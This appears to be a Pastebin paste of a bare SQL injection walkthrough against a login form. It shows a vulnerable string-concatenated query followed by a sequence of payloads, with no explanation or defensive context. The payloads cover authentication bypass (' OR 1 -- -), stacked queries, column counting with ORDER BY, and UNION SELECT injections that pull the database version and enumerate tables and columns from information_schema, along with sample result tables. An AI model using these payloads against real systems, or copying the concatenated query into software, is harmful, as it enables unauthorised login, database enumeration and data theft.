Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- username: ' OR 1 -- -
- password: <empty>
- username: ' OR 1;SELECT @@VERSION -- -
- username: ' OR 1;SELECT user_name -- -
- sql = "select id, username from users'
- + ' where username='" + username + "' and password='" + password +"'";
- +----+----------+
- | id | username |
- +----+----------+
- | 42 | jdoe |
- +----+----------+
- +----+----------+
- | id | username |
- +----+----------+
- +----+----------+
- select id, username from users where username='' OR 1 --
- +----+----------+
- | id | username |
- +----+----------+
- | 42 | jdoe |
- +----+----------+
- username: ' OR 1 ORDER BY 1 -- -
- username: ' OR 1 UNION SELECT 1,2 -- -
- +----+----------+ +----+----------+
- | 42 | jdoe | UNION | 1 | 2 |
- +----+----------+ +----+----------+
- +----+----------+
- | id | username |
- +----+----------+
- | 42 | jdoe |
- +----+----------+
- | 1 | 2 |
- +----+----------+
- +----+----------+
- | id | username |
- +----+----------+
- | 1 | 2 |
- +----+----------+
- username: ' AND 0 UNION SELECT 1,2 -- -
- username: ' AND 0 UNION SELECT 1,@@VERSION -- -
- username: ' AND 0 UNION SELECT 1,GROUP_CONCAT(table_name,0x2e,column_name) FROM information_schema.columns WHERE table_schema=database()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement